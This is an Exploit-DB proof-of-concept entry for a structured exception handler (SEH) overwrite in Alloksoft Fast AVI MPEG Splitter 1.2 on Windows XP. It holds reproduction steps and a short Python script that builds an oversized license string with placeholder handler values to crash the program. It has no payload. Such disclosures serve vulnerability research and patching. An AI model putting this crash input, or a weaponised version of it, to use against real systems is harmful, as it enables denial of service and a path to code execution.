EDB-ID: 45120 | Author: Shubham Singh | Published: 2018-08-01 | CVE: N/A | Type: Local | Platform: Windows | Vulnerable App: N/A | # Vulnerability Type: SEH Overwrite POC
# Discovery by: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Discovey Date: 2018-08-01
# Software Link: http://www.alloksoft.com/fast_splitter.htm
# Tested Version: 1.2
# Tested on OS: Windows XP Service Pack 3 x86
# Steps to Reproduce:
# Run the python exploit.py , Open "exploit.txt" and copy content.
# Open Fast AVI MPEG Splitter , A registration prompt will appear.
# In the License field paste the content of "exploit.txt".
# Press "OK" and B00m Crashed.
#!/usr/bin/env python
# SEH chain of main thread, item 0
# Address=00129B78
# SE handler=43434343
# SEH chain of main thread, item 1
# Address=42424242
# SE handler=*** CORRUPT ENTRY ***
buffer = "\x41" * 544
nseh = "\x42\x42\x42\x42"
seh= "\x43\x43\x43\x43"
exploit = buffer + nseh + seh
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()
